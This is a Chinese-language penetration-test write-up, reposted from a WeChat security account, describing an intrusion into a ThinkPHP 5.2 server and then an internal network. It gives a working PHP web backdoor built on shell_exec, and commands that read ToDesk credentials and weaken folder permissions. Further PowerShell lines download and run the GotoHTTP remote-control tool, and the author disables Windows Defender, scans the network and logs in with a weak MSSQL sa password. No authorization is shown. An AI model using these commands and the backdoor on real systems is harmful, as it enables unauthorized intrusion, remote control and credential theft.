前情摘要,这次的渗透让我学到了不少东西,算是突破自己,也是正面的刚了下windows defender
信息搜集****.com是thinkphp5.2
打rce成功,可以写shell
但是无法正常用eval等等函数,无法连接webshell(免杀也连接不上),反弹shell也不行,上传phpinfo可以解析,但是发现没有Disable function
我们这么写
if (isset($_GET['p']) && $GET['p'] == '' && isset($_GET['cmd'])) { echo mb_convert_encoding(shell_exec($_GET['cmd']), 'UTF-8', 'auto'); } 
获取进程发现windows defender
同时发现了todesk
***.php?p=_&cmd=wmic process where "name='ToDesk.exe'" get processid, executablepath
获取todesk位置
***.php?p=_&cmd=type "C:Program FilesToDeskconfig.ini"
获取tempAuthPassEx替换
但是不管是4.5版本或者其他的都不成功
我也不知道为啥获取不到密码,我当时还不会dump内存获取密码
所以换个思路,我们重新整理下
我现在能命令执行
能上传文件
那么我写一个传文件的html然后传gotohttp
我们先写了一个但是发现权限不够?
使用icacls "D:********OApublic" /grant Everyone:(OI)(CI)F改目录权限
还是不行,我放弃自己写文件上传了
我们用curl -O http://gotohttp.com/gotohttp_x64.zip下载下来
发现curl是不行的
那么我们用powershell -Command "Invoke-WebRequest -Uri 'http://gotohttp.com/gotohttp_x64.zip' -OutFile 'gotohttp_x64.zip'"
发现成功下载
nice
然后解压
powershell -Command "Expand-Archive -Path 'gotohttp_x64.zip' -DestinationPath '.'"
start GotoHTTP_x64.exe
然后读取
GotoHTTP_x64.ini
连接
爽,进到桌面
获取todesk
关闭defender
做一个正向代理
fscan扫描
****扫描内容不展示了
10.10.***.119是已经拿下的机子WIN-****
然后
[*] 10.10.***.220 WORKGROUPWIN-**** Windows Server 2016 Datacenter 14393
mssql:10.10.****.220:1433:sa admin@123
连接发现是dba权限
执行命令whoami
发现
然后我们激活组件
成功命令执行
然后用文件上传功能传gotohttp,并启动,读取ini连接
但是不稳定传不上去
还是powershell -Command "Invoke-WebRequest -Uri 'http://gotohttp.com/gotohttp_x64.zip' -OutFile 'D:/资料/gotohttp_x64.zip'"上去解压
powershell -Command "Expand-Archive -Path 'D:/资料/gotohttp_x64.zip' -DestinationPath 'D:/资料/'"
然后连接发现黑屏
重启也无果我也不知道咋回事
剩下的就没啥重大产出了,没有域没有横向,一堆空的root权限弱口令ssh,空的ftp仅此而已
原文始发于微信公众号(秋风的安全之路):一次渗透记录分享
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论